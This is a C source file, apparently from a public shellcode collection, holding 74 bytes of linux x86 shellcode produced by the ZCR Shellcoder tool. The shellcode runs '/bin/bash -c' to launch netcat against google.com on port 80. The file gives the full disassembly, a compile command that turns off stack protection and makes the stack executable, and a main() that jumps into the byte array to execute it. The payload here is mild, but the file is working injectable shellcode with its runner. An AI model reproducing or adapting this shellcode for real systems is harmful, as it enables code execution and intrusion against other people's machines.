1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55 | #include <stdio.h>
#include <string.h>
/*
This shellcode generated by ZCR Shellcoder [zsc] http://zsc.z3r0d4y.com/
Title: system('nc[space]-v[space]google.com[space]80')
OS: linux_x86
Encode: none
Length: 74
shellcode.c: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 6a 0b push $0xb
2: 58 pop %eax
3: 99 cltd
4: 52 push %edx
5: 68 90 20 38 30 push $0x30382090
a: 59 pop %ecx
b: c1 e9 08 shr $0x8,%ecx
e: 51 push %ecx
f: 68 2e 63 6f 6d push $0x6d6f632e
14: 68 6f 67 6c 65 push $0x656c676f
19: 68 76 20 67 6f push $0x6f672076
1e: 68 6e 63 20 2d push $0x2d20636e
23: 89 e6 mov %esp,%esi
25: 52 push %edx
26: 68 90 90 2d 63 push $0x632d9090
2b: 59 pop %ecx
2c: c1 e9 10 shr $0x10,%ecx
2f: 51 push %ecx
30: 89 e1 mov %esp,%ecx
32: 52 push %edx
33: 6a 68 push $0x68
35: 68 2f 62 61 73 push $0x7361622f
3a: 68 2f 62 69 6e push $0x6e69622f
3f: 89 e3 mov %esp,%ebx
41: 52 push %edx
42: 57 push %edi
43: 56 push %esi
44: 51 push %ecx
45: 53 push %ebx
46: 89 e1 mov %esp,%ecx
48: cd 80 int $0x80
compile example: gcc -ggdb -static -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o shellcode_compiled shellcode.c
*/
int main(){
unsigned char shellcode[]= "\x6a\x0b\x58\x99\x52\x68\x90\x20\x38\x30\x59\xc1\xe9\x08\x51\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x76\x20\x67\x6f\x68\x6e\x63\x20\x2d\x89\xe6\x52\x68\x90\x90\x2d\x63\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
|